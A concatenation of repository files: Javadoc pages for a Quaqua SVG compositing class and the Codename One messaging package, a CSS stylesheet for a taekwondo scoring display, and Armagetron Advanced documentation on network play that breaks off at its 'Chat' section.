<dd><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">SVGComposite</a></dd>
</dl>
<hr>
<br>
<pre>public static class <span class="typeNameLabel">SVGComposite.InCompositeContext_INT_PACK</span>
extends <a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext_INT_PACK.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">SVGComposite.AlphaPreCompositeContext_INT_PACK</a></pre>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd"> </span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd"> </span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd"> </span></span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr id="i0" class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.InCompositeContext_INT_PACK.html#precompose_INT_PACK-int-int-int:A-int-int-int:A-int-int-int:A-int-int-">precompose_INT_PACK</a></span>(int width,
int height,
int[] srcPixels,
int srcAdjust,
int srcSp,
int[] dstInPixels,
int dstInAdjust,
int dstInSp,
int[] dstOutPixels,
int dstOutAdjust,
int dstOutSp)</code> </td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.ch.randelshofer.quaqua.ext.batik.ext.awt.image.SVGComposite.AlphaPreCompositeContext_INT_PACK">
<!-- -->
</a>
<h3>Methods inherited from class ch.randelshofer.quaqua.ext.batik.ext.awt.image.<a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext_INT_PACK.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">SVGComposite.AlphaPreCompositeContext_INT_PACK</a></h3>
<code><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext_INT_PACK.html#precompose-java.awt.image.Raster-java.awt.image.Raster-java.awt.image.WritableRaster-">precompose</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.ch.randelshofer.quaqua.ext.batik.ext.awt.image.SVGComposite.AlphaPreCompositeContext">
<!-- -->
</a>
<h3>Methods inherited from class ch.randelshofer.quaqua.ext.batik.ext.awt.image.<a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">SVGComposite.AlphaPreCompositeContext</a></h3>
<code><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext.html#compose-java.awt.image.Raster-java.awt.image.Raster-java.awt.image.WritableRaster-">compose</a>, <a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext.html#dispose--">dispose</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method.detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="precompose_INT_PACK-int-int-int:A-int-int-int:A-int-int-int:A-int-int-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>precompose_INT_PACK</h4>
<pre>public void precompose_INT_PACK(int width,
int height,
int[] srcPixels,
int srcAdjust,
int srcSp,
int[] dstInPixels,
int dstInAdjust,
int dstInSp,
int[] dstOutPixels,
int dstOutAdjust,
int dstOutSp)</pre>
<dl>
<dt><span class="overrideSpecifyLabel">Specified by:</span></dt>
<dd><code><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext_INT_PACK.html#precompose_INT_PACK-int-int-int:A-int-int-int:A-int-int-int:A-int-int-">precompose_INT_PACK</a></code> in class <code><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.AlphaPreCompositeContext_INT_PACK.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image">SVGComposite.AlphaPreCompositeContext_INT_PACK</a></code></dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><font size=-2>Copyright 2003-2007 (c) Werner Randelshofer.<br>All rights reserved.</font></div>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.InCompositeContext.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../../../../../ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.LightenCompositeContext.html" title="class in ch.randelshofer.quaqua.ext.batik.ext.awt.image"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../../../../index.html?ch/randelshofer/quaqua/ext/batik/ext/awt/image/SVGComposite.InCompositeContext_INT_PACK.html" target="_top">Frames</a></li>
<li><a href="SVGComposite.InCompositeContext_INT_PACK.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li>Constr | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li>Constr | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
trunk/frontend/html/include/css/forms/worldclass/worldclassApp.css | mikewongtkd/freescoretkd | body {
background: black;
background: -webkit-linear-gradient(to bottom, #45484d 0%, #000000 100%);
/* W3C */
background: linear-gradient(to bottom, #45484d 0%, #000000 100%);
/* W3C */
}
@font-face {
font-family: "Lato";
src: url("/include/fonts/Lato-Regular.ttf"), url("/freescore/include/fonts/Lato-Regular.ttf");
font-weight: normal;
font-style: normal;
}
@font-face {
font-family: "Lato";
src: url("/include/fonts/Lato-Italic.ttf"), url("/freescore/include/fonts/Lato-Italic.ttf");
font-weight: normal;
font-style: italic;
}
@font-face {
font-family: "Lato";
src: url("/include/fonts/Lato-Bold.ttf"), url("/freescore/include/fonts/Lato-Bold.ttf");
font-weight: bold;
font-style: normal;
}
@font-face {
font-family: "Lato";
src: url("/include/fonts/Lato-BoldItalic.ttf"), url("/freescore/include/fonts/Lato-BoldItalic.ttf");
font-weight: bold;
font-style: italic;
}
@font-face {
font-family: "Biolinum";
src: url("/include/fonts/LinBiolinum_Rah.ttf"), url("/freescore/include/fonts/LinBiolinum_Rah.ttf");
font-weight: normal;
font-style: normal;
}
@font-face {
font-family: "Barlow";
src: url("/include/fonts/BarlowCondensed-Bold.ttf"), url("/freescore/include/fonts/BarlowCondensed-Bold.ttf");
font-weight: normal;
font-style: normal;
}
@font-face {
font-family: "FjallaOne";
src: url("/include/fonts/FjallaOne-Regular.ttf"), url("/freescore/include/fonts/FjallaOne-Regular.ttf");
font-weight: normal;
font-style: normal;
}
@font-face {
font-family: "Glyphicons Halflings";
src: url("/include/bootstrap/fonts/glyphicons-halflings-regular.ttf"), url("/freescore/include/bootstrap/fonts/glyphicons-halflings-regular.ttf");
font-weight: normal;
font-style: normal;
}
.worldclass {
margin: 0 auto 0 auto;
width: 1000px;
}
.worldclass .scoreboard {
font-family: FjallaOne, Barlow;
display: none;
width: 1000px;
height: 720px;
border-radius: 24px;
border: 4px solid white;
margin-top: 20px;
}
.worldclass .scoreboard .judgeScores {
position: absolute;
top: 0;
left: 0;
width: 292px;
height: 712px;
margin: 0 0 20px 0;
}
.worldclass .scoreboard .judges7 .judge {
font-size: 24pt;
line-height: 24pt;
}
.worldclass .scoreboard .judges7 .score {
font-size: 48pt;
line-height: 48pt;
}
.worldclass .scoreboard .judges5 .judge {
font-size: 24pt;
line-height: 24pt;
}
.worldclass .scoreboard .judges5 .score {
font-size: 48pt;
line-height: 48pt;
}
.worldclass .scoreboard .judges3 .judge {
font-size: 36pt;
line-height: 36pt;
}
.worldclass .scoreboard .judges3 .score {
font-size: 64pt;
line-height: 64pt;
}
.worldclass .scoreboard .judgeScore {
position: absolute;
text-align: center;
width: 292px;
height: 101.5px;
background: black;
background: -webkit-linear-gradient(to top, #45484d 0%, #000000 100%);
background: linear-gradient(to top, #45484d 0%, #000000 100%);
}
.worldclass .scoreboard .judgeScore .judge {
position: absolute;
top: 0;
left: 0;
padding: 30px 0 0 0;
color: #999;
margin: 0 auto 0 auto;
width: 40px;
height: 72px;
}
.worldclass .scoreboard .judgeScore .ignore-judge {
color: #333;
}
.worldclass .scoreboard .judgeScore .score {
position: absolute;
top: 10px;
left: 40px;
color: #666;
margin: 0 auto 0 auto;
width: 260px;
height: 92px;
}
.worldclass .scoreboard .judgeScore .score .accuracy {
color: #f99;
}
.worldclass .scoreboard .judgeScore .score .ignore-acc {
opacity: 0.75;
position: relative;
color: #c66;
}
.worldclass .scoreboard .judgeScore .score .ignore-acc::after {
opacity: 0.75;
border-bottom: 8px solid #c66;
content: "";
position: absolute;
left: 0;
top: 50%;
right: 0;
}
.worldclass .scoreboard .judgeScore .score .presentation {
color: #99f;
}
.worldclass .scoreboard .judgeScore .score .ignore-pre {
opacity: 0.75;
position: relative;
color: #66c;
}
.worldclass .scoreboard .judgeScore .score .ignore-pre::after {
opacity: 0.75;
border-bottom: 8px solid #66c;
content: "";
position: absolute;
left: 0;
top: 50%;
right: 0;
}
.worldclass .scoreboard .judgeScore .score .received {
color: #0c0;
}
.worldclass .scoreboard .ignore .judge {
color: #333;
}
.worldclass .scoreboard .ignore .score {
color: #333;
}
.worldclass .scoreboard .totalScores {
position: absolute;
top: 0;
left: 292px;
text-align: center;
height: 712px;
width: 700px;
font-weight: bold;
color: white;
background: black;
background: -webkit-linear-gradient(to top, #45484d 0%, #000000 100%);
background: linear-gradient(to top, #45484d 0%, #000000 100%);
border-radius: 0 24px 24px 0;
}
.worldclass .scoreboard .totalScores .red, .worldclass .scoreboard .totalScores .hong {
color: #f66;
}
.worldclass .scoreboard .totalScores .blue, .worldclass .scoreboard .totalScores .chung {
color: #66f;
}
.worldclass .scoreboard .totalScores .athlete {
position: absolute;
top: 0;
left: 0;
color: yellow;
margin: 0;
height: 120px;
width: 694px;
font-size: 72pt;
line-height: 72pt;
text-align: center;
overflow: hidden;
}
.worldclass .scoreboard .totalScores .flag {
position: absolute;
top: 0;
left: 0;
padding: 16px 4px 4px 4px;
height: 128px;
width: 128px;
}
.worldclass .scoreboard .totalScores .round {
position: absolute;
top: 580px;
left: 0;
margin: 0;
color: #999;
height: 40px;
font-size: 24pt;
width: 700px;
}
.worldclass .scoreboard .totalScores .round ul {
list-style-type: none;
line-height: 30pt;
height: 40px;
}
.worldclass .scoreboard .totalScores .round ul b {
color: orange;
}
.worldclass .scoreboard .totalScores .score {
position: absolute;
top: 80px;
left: 0;
height: 500px;
width: 700px;
}
.worldclass .scoreboard .totalScores .score .accuracy {
position: absolute;
top: 16px;
left: 16px;
width: 248px;
height: 80px;
color: #600;
font-size: 96pt;
line-height: 96pt;
color: #f99;
}
.worldclass .scoreboard .totalScores .score .presentation {
position: absolute;
top: 16px;
left: 438px;
width: 248px;
height: 80px;
color: #006;
font-size: 96pt;
line-height: 96pt;
color: #99f;
}
.worldclass .scoreboard .totalScores .score .total {
position: absolute;
top: 64px;
left: 0;
width: 700px;
height: 290px;
color: lime;
font-size: 280pt;
}
.worldclass .scoreboard .totalScores .forms {
position: absolute;
top: 620px;
left: 0;
width: 700px;
height: 80px;
}
.worldclass .scoreboard .totalScores .forms .form {
position: absolute;
top: 0;
left: 0;
width: 152px;
height: 72px;
background: black;
background: -webkit-linear-gradient(to top, #45484d 0%, #000000 100%);
background: linear-gradient(to top, #45484d 0%, #000000 100%);
border: 4px solid #c96;
border-radius: 24px;
}
.worldclass .scoreboard .totalScores .forms .form .name {
color: #996;
font-size: 14pt;
position: absolute;
top: 64px;
left: 0;
width: 144px;
height: 20px;
text-align: center;
}
.worldclass .scoreboard .totalScores .forms .form .score {
color: yellow;
font-size: 48pt;
line-height: 48pt;
position: absolute;
top: 4px;
left: 0;
width: 144px;
height: 60px;
text-align: center;
}
.worldclass .scoreboard .totalScores .penalty {
color: white;
font-size: 24pt;
position: absolute;
width: 100px;
height: 41px;
}
.worldclass .scoreboard .totalScores .penalty .icon {
position: absolute;
left: 0px;
top: 0px;
background: darkorchid;
background-size: 28px;
border-radius: 21px;
width: 41px;
height: 41px;
}
.worldclass .scoreboard .totalScores .penalty .icon .glyphicon {
position: absolute;
font-size: 22pt;
top: 6px;
left: 6px;
}
.worldclass .scoreboard .totalScores .penalty .value {
position: absolute;
left: 44px;
top: -2px;
height: 41px;
}
.worldclass .scoreboard .totalScores .bounds {
left: 254px;
top: 168px;
}
.worldclass .scoreboard .totalScores .timelimit {
left: 254px;
top: 120px;
}
.worldclass .scoreboard .totalScores .restart {
left: 354px;
top: 168px;
}
.worldclass .scoreboard .totalScores .misconduct {
left: 354px;
top: 120px;
}
.worldclass .leaderboard {
width: 1000px;
height: 720px;
font-family: FjallaOne, Barlow;
color: white;
overflow: hidden;
}
.worldclass .leaderboard .division {
width: 1000px;
height: 720px;
overflow: hidden;
}
.worldclass .leaderboard .division .placement {
position: absolute;
width: 984px;
font-size: 48pt;
background: black;
background: -webkit-linear-gradient(to top, #45484d 0%, #000000 100%);
/* W3C */
background: linear-gradient(to top, #45484d 0%, #000000 100%);
/* W3C */
border: 4px solid white;
border-radius: 24px;
padding: 0 32px 8px 32px;
overflow-y: auto;
}
.worldclass .leaderboard .division .placement h2 {
color: white;
}
.worldclass .leaderboard .division .placement .rank1 {
color: #fe0;
}
.worldclass .leaderboard .division .placement .rank2 {
color: #ccc;
}
.worldclass .leaderboard .division .placement .rank3 {
color: #f93;
}
.worldclass .leaderboard .division .placement .rank4 {
color: #f93;
}
.worldclass .leaderboard .division .placement .athlete {
position: relative;
height: 72px;
width: 100%;
}
.worldclass .leaderboard .division .placement .athlete .number {
color: #999;
font-size: 36pt;
position: absolute;
left: 0;
width: 4%;
font-weight: bold;
overflow: hidden;
}
.worldclass .leaderboard .division .placement .athlete .name {
color: yellow;
position: absolute;
left: 4%;
width: 50%;
font-weight: bold;
text-overflow: ellipse;
overflow: hidden;
}
.worldclass .leaderboard .division .placement .athlete .form1 {
color: #f39;
position: absolute;
left: 54%;
width: 13%;
text-align: center;
}
.worldclass .leaderboard .division .placement .athlete .form2 {
color: #39f;
position: absolute;
left: 68%;
width: 13%;
text-align: center;
}
.worldclass .leaderboard .division .placement .athlete .score {
color: lime;
position: absolute;
left: 80%;
width: 20%;
text-align: center;
}
.worldclass .leaderboard .division .placement .athlete .score .notes {
font-size: 24pt;
color: green;
display: inline-block;
}
.worldclass .leaderboard .division .placement .athlete .medal {
position: relative;
left: 0;
top: 16px;
width: 0;
}
.worldclass .leaderboard .division .placement .results {
line-height: 64pt;
}
.worldclass .leaderboard .division .placement .header {
font-size: 14pt;
line-height: 14pt !important;
height: 20px;
opacity: 0.7;
border-bottom: 2px solid #666;
vertical-align: top;
}
.worldclass .leaderboard .division .pending {
position: absolute;
width: 984px;
color: #999;
font-size: 24pt;
background: black;
background: -webkit-linear-gradient(to top, #45484d 0%, #000000 100%);
/* W3C */
background: linear-gradient(to top, #45484d 0%, #000000 100%);
/* W3C */
border: 4px solid white;
border-radius: 24px;
padding: 0 32px 8px 32px;
overflow-x: hidden;
overflow-y: hidden;
}
.worldclass .leaderboard .division .pending h2 {
color: white;
}
.worldclass .leaderboard .division .pending .athlete {
position: relative;
height: 72px;
width: 100%;
}
.worldclass .leaderboard .division .pending .athlete .number {
color: #999;
font-size: 36pt;
position: absolute;
left: 0;
width: 8%;
height: 100%;
font-weight: bold;
overflow: hidden;
}
.worldclass .leaderboard .division .pending .athlete .name {
color: lime;
font-weight: bold;
font-size: 48pt;
line-height: 48pt;
position: absolute;
left: 8%;
width: 92%;
height: 100%;
font-weight: bold;
text-overflow: ellipse;
overflow: hidden;
}
.worldclass .leaderboard .division .top-row {
position: absolute;
height: 480px;
top: 0;
left: 0;
}
.worldclass .leaderboard .division .bottom-row {
position: absolute;
height: 200px;
top: 500px;
left: 0;
}
.worldclass .leaderboard .division .full-height {
position: absolute;
height: 704px;
top: 0;
left: 0;
}
.usermessage {
font-family: Optima, Biolinum, Lato;
font-size: 24pt;
color: #ccc;
display: none;
border: 8px solid red;
border-radius: 24px;
width: 934px;
margin: 80px auto 80px auto;
padding: 0 32px 32px 32px;
}
.usermessage h1 {
color: white;
}
.usermessage code {
color: gold;
font-size: 18pt;
}
.enter-down-bounce {
-webkit-animation: enterDownBounce 1s linear;
}
.leave-up-bounce {
-webkit-animation: leaveUpBounce 1s linear;
}
@-webkit-keyframes enterDownBounce {
0% {
-webkit-transform: translateY(-600px);
opacity: 0.25;
}
50% {
-webkit-transform: translateY(0px);
}
70% {
-webkit-transform: translateY(-50px);
}
100% {
-webkit-transform: translateY(0px);
opacity: 1;
}
}
@-webkit-keyframes leaveUpBounce {
0% {
-webkit-transform: translateY(0px);
opacity: 1;
}
10% {
-webkit-transform: translateY(50px);
opacity: 1;
}
25% {
-webkit-transform: translateY(0px);
}
100% {
-webkit-transform: translateY(-900px);
opacity: 0;
}
}
/*# sourceMappingURL=worldclassApp.css.map */
|
CodenameOne/javadoc/com/codename1/messaging/package-summary.html | skyHALud/codenameone | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_04) on Wed Jul 02 15:54:03 IDT 2014 -->
<title>com.codename1.messaging (Codename One API)</title>
<meta name="date" content="2014-07-02">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="com.codename1.messaging (Codename One API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li class="navBarCell1Rev">Package</li>
<li>Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../com/codename1/media/package-summary.html">Prev Package</a></li>
<li><a href="../../../com/codename1/payment/package-summary.html">Next Package</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?com/codename1/messaging/package-summary.html" target="_top">Frames</a></li>
<li><a href="package-summary.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 title="Package" class="title">Package com.codename1.messaging</h1>
<div class="docSummary">
<div class="block">
This API allows to send e-mail messages through underlying platforms e-mail clients.</div>
</div>
<p>See: <a href="#package_description">Description</a></p>
</div>
<div class="contentContainer">
<ul class="blockList">
<li class="blockList">
<table class="packageSummary" border="0" cellpadding="3" cellspacing="0" summary="Class Summary table, listing classes, and an explanation">
<caption><span>Class Summary</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Class</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="../../../com/codename1/messaging/Message.html" title="class in com.codename1.messaging">Message</a></td>
<td class="colLast">
<div class="block">Represents a message to be sent using underlying platform e-mail client.</div>
</td>
</tr>
</tbody>
</table>
</li>
</ul>
<a name="package_description">
<!-- -->
</a>
<h2 title="Package com.codename1.messaging Description">Package com.codename1.messaging Description</h2>
<div class="block"><p>
This API allows to send e-mail messages through underlying platforms e-mail clients.
</p></div>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li class="navBarCell1Rev">Package</li>
<li>Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../com/codename1/media/package-summary.html">Prev Package</a></li>
<li><a href="../../../com/codename1/payment/package-summary.html">Next Package</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?com/codename1/messaging/package-summary.html" target="_top">Frames</a></li>
<li><a href="package-summary.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
src/doc/network.html | alvaromateo/armagetronad |
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="date" content="2015-02-26T20:37:48+01:00">
<meta name="author" content="Manuel Moos">
<title>Armagetron Advanced: Documentation</title>
<meta name="description" content="Armagetron Advanced: Documentation">
</head><body>
<table width="90%" align=center>
<tr>
<td align=center width="15%">
<a href="index.html" target="_top">First Start</a>
</td>
<td align=center width="15%">
<a href="install_windows.html" target="_top">Windows Installation</a>
</td>
<td align=center width="15%">
<a href="install_macosx.html" target="_top">Mac OS X Installation</a>
</td>
<td align=center width="15%">
<a href="install_linux.html" target="_top">Linux Installation</a>
</td>
<td align=center width="15%">
<strong>Network Play</strong>
</td>
<td align=center width="15%">
<a href="config.html" target="_top">Configuration</a>
</td>
<td align=center width="10%">
<a href="faq.html" target="_top">FAQ</a>
</td>
<td align=center width="15%">
<a href="compile.html" target="_top">Redistribution</a>
</td>
</tr>
</table>
<a name=np><a name=><h1 align=center>Network Play</h1></a></a>
<p align=justify>
You can play Armagetron Advanced over a LAN or the Internet. It uses the UDP
connectionless communication mode of the IP protocol, so make sure
you have TCP/IP installed and activated if you experience problems.
</p>
<a name=><h2 align=left>Connecting</h2></a>
<a name=><h3 align=left>LAN game </h3></a>
<p align=justify>
The fastest computer in your network should
act as the server. There, go to the network menu and hit the "LAN Game"-
menu item. After a second, Armagetron Advanced should tell you that there are no servers
currently available, but offer a "Host Game" item. Press Return on it. In
the following menu, you can select a name for your server and the game options.
The game options here are completely independent from those in single
player mode.
After everything is to your liking, you can hit the "Host Network Game"
menu item and the game will start on the server and
run just as in single player mode.
</p>
<p align=justify>
The other computers will be the clients. On them, you activate the "LAN Game"
menu item, too. This time however, there should be the server you just started
visible in the server browser. Just hit Return on it to connect.
</p>
<a name=><h3 align=left>Internet game</h3></a>
<p align=justify>
An internet game works the same way; you just have to choose "Internet Game" instead of "LAN Game"
in the menu. Note that the number of users currently online on each server is displayed
by the server browser, too.
</p>
<p align=justify>
While in the server browser, you use "cursor left/right" to change the sorting
key, +/- to give individual servers a bias to the score (and thus their place
with on the list if you sort by score which is the default). Add servers to
your <a href="network.html#bookmarks" target=_top>bookmarks</a> with "b" and refresh all servers
with "r".
</p>
<p align=justify>Internet server browsing would not be possible without master servers. We currently
use four masters,
one in Texas run by Lucifer, one in Virginia run by antix of
<a href="http://distortgaming.com" target=_top><strong>DistortGaming</strong></a>
(Who will gladly host your game server, Armagetronad or other. Shameless plug end.)
one run on Z-Man's old, trusty laptop-gone-router in Germany, and another one in Germany run
by iF.
DNS service for swapping out masters without you having to update your configuration
is provided by Tank.</p>
<a name=><h4 align=left>Current status</h4></a>
<p align=justify>
Current counts show about 40 active servers.
If you're not picky about your fellow players, there should be
someone to battle against on one of those. The problems start as soon as you
develop a preference for certain server settings, because there are quite a
number of flavors around.
</p>
<a name=bookmarks><h3 align=left>Bookmarks</h3></a>
<p align=justify>
You can access and edit your server bookmarks in the "Server Bookmarks"
submenu of the "Network Game" menu. You can add bookmarks from the server
browser or manually add bookmarks via the "Edit Bookmarks" menu.
</p>
<a name=><h3 align=left>Version Control</h3></a>
<p align=justify>
Server and client do not need to be of the same version. With default settings, the current
server is compatible with clients down to 0.2.0, and the current client with servers down to 0.2.0.
Obviously, some new settings were introduced since then; if you change them away from the default,
three things can happen when an old client connects:</p>
<list>
<li>Variant 0: Nothing. The old client is allowed to connect, and the setting stays like it was.
It's the player's problem if something goes wrong.</li>
<li>Variant 1: The offending setting automatically reverts to its default value.</li>
<li>Variant 2: The old client is not allowed to connect. The player is already informed of that
in the server browser.</li>
</list>
<p align=justify>
You will be informed on the console when you change one of the affected settings which variant
will be used for it, and clients up to which version are affected.</p>
<p align=justify>
Settings are classified into five groups: Breaking, Bumpy, Annoying, Cheating and Visual. Settings of
the "Breaking" group absolutely destroy the game for old clients when they are not on their default
values; setting a custom map file is the perfect example. The "Bumpy" group allows basic play
for old clients, but it's not likely to be a pleasant experience. Examples would be <code>CYCLE_DELAY</code>
and <code>CYCLE_TURN_SPEED_FACTOR</code>. The "Annoying" group allows more or less pleasant gameplay
with only little disturbances that feel a bit like small bugs. The
<code>CYCLE_RUBBER_MINDISTANCE</code> setting
family belongs to this group. When a client does not honor settings of the "Cheating" group,
this is supposed to be considered cheating. An example is the <code>DOUBLEBIND_TIME</code>
setting, and the
<code>CAMERA_FORBID_</code> settings would fall into that category,
too (but all clients know about them). Lastly,
"Visual" settings only affect displayed information and have no influence on gameplay.
And in fact, there is a sixth group where the behavior is hardcoded to either variant 1 or 0.
</p>
<a name=><h4 align=left>Customizing Version Control</h4></a>
<p align=justify>
Which of the three behavior variants is used for settings of the five categories is
determined by the <code>SETTING_LEGACY_BEHAVIOR_</code> settings in <strong>settings.cfg</strong>.
The default settings block old clients on Breaking, Bumpy and Cheating settings
(Variant 2), and ignore possible conflicts for Annoying and Visual settings (Variant 0).
To override the group defaults, you can define exceptions for single settings; if you
want to revert the setting <code>FOO</code> to its default when an old client connects,
then you set <code>FOO_OVERRIDE</code> to 1.
</p>
<p align=justify>
You can also lock out old clients independently of incompatible settings;
use the variable <code>BACKWARD_COMPATIBILITY</code> for that. Setting it to 0 will only
allow the most current clients to connect. You can also disable some new features to
be activated by setting <code>NEW_FEATURE_DELAY</code> to some positive value.
If both configuration variables are set to the same value, no feature will be enabled
or disabled just because an old client connects/disconnects. The numbers these two settings
refer to are raw network protocol versions; <a href="versions.html" target=_top>see here</a> for a table
comparing them with release versions.
</p>
<a name=><h2 align=left>Interpersonals</h2></a>
Please behave like a human being on the game grid. Don't use offensive language
when asked, sometimes there are children online. Help newbies into the game. Follow
the rules of the server administrator or change the server you play on.
<a name=><h3 align=left>Chat</h3></a>
<p align=justify>
